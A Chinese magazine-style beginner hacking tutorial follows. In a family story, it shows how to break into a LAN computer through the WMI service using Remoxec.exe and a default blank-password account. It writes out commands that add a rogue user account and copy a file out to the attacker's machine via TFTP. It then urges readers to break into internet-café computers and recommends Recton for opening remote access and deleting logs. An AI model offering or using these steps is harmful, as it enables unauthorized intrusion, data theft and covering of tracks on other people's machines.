默认系统服务竞成入侵之“门”
网络安全
想当黑客,却看不懂网上的技术资料,不知道该怎么入门?如果你有这样的烦恼,就一定要看我们为初学者推出的黑客入门系列“家有黑客”,你能在轻松愉快的阅读中,学到你以前感觉很难的黑客技术。
本期知识:如何通过WMI服务入侵计算机
技术难度:★★☆
学习进度:第三期
在局域网中入侵的方式有很多,以前很多人喜欢用3389端口入侵,因为它非常简单,但现在开启3389端口的电脑已经很少见了,还有其他简单易学又容易找到目标的入侵方式吗?有的,那就是利用默认开启的系统服务入侵。
自从上次教会了女儿如何扫描IP地址和端口后,她就深深地喜欢上了黑客技术,空闲时就用工具一阵狂扫。很快老婆对女儿的这种情况就产生了意见,中午吃饭时向我抱怨:“女儿现在练琴的时间越来越少了,都是你教她什么黑客技术害的,你说怎么办?”我尴尬地笑了笑,向老婆保证一切交给我来搞定。
女儿放学回家后,我就开始“诱惑”她:“现在你学会扫描IP地址和端口了,但你知道怎么利用它们吗?”“不知道,我该怎么利用它们呢?”
“想知道?”
“想啊!”
“这样吧,你答应我以后好好练琴,爸爸就教你,如何?嗯,你妈妈笔记本电脑上有个神秘的文件——工作.xls,你练好琴后爸爸就教你远程拿到它。”
“……”
利用默认系统服务远程入侵
女儿练好琴后,来到书房找我“传道授业”,我通知老婆打开笔记本电脑后,就叫女儿先扫描老婆的笔记本电脑。不一会儿,女儿就向我报告:“妈妈笔记本电脑的IP地址是192.168.150.128,端口开放了80、110、135、139,怎么比以前多了135、139端口(图1)?”
那是我特意为女儿准备的,给笔记本电脑安装了《电脑公司GhostXP》,该系统默认有一个用户名为new、密码为空的账户。我们知道了用户名和密码,而且135端口和WMI服务已经开启,我们就可以在对方的机器上执行任意命令。
小知识:WMI是Windows Management Instrumentation服务的简称,是默认启动的(图2),可以用来进行远程电脑的管理。
我先运行WMI入侵工具Remoxec.exe,然后在“地址”栏里写入老婆笔记本电脑的IP地址192.168.150.128,在“用户名”中填入“new”,密码则为空(图3)。最后,我在“命令或程序名”中输入要执行的命令。
我输入的是“net user baby 123456 /add”,意思是在老婆笔记本电脑上新建一个用户名为baby、密码为123456的账户。命令成功执行后,会弹出一个对话框,提示命令已成功执行并标注PID值。
接着,我又运行了FTP软件tftpd32.exe,利用它就可以把我的电脑当作一台简单的FTP服务器,将老婆笔记本电脑里面的工作.xls文件传送到我的电脑中。我又在Remoxec.exe的“命令或程序名”中输入了一条命令:tftp -i 192.168.150.1(这是本机的IP地址) put c:\DOCUME~1\new\桌面\工作.xls。点击“运行”后显示执行成功(图4),我把电脑交给女儿操作,她模仿我的操作步骤后,很快就得到了工作.xls文件,兴奋地跑到妈妈那里去炫耀了。
我的经验
在局域网入侵中,通过WMI服务入侵是比较常见的方式,很多新配的电脑都没有关闭WMI服务,入侵成功率还是比较高的。需要注意的是,如果目标系统中有防火墙存在,入侵的失败率会大大增加。
WMI入侵最好的环境是在网吧中,只要我们得知自己上机电脑的账号和密码,用WMI就可以入侵网吧内任何一台电脑了。因为网吧中所有电脑的登录密码几乎都是一样的(账号则有一定规律)。
除了用WMI入侵局域网外,还可以通过IPC$共享进行入侵,当然IPC$入侵的技术难度比WMI入侵要高,但在没有WMI入侵工具时,可以尝试IPC$入侵,有兴趣的朋友可以参考相关资料。
最后,再向大家推荐一款WMI攻击工具——Recton,它内置了开启3389端口、开启Telnet、重启、删除日志等功能。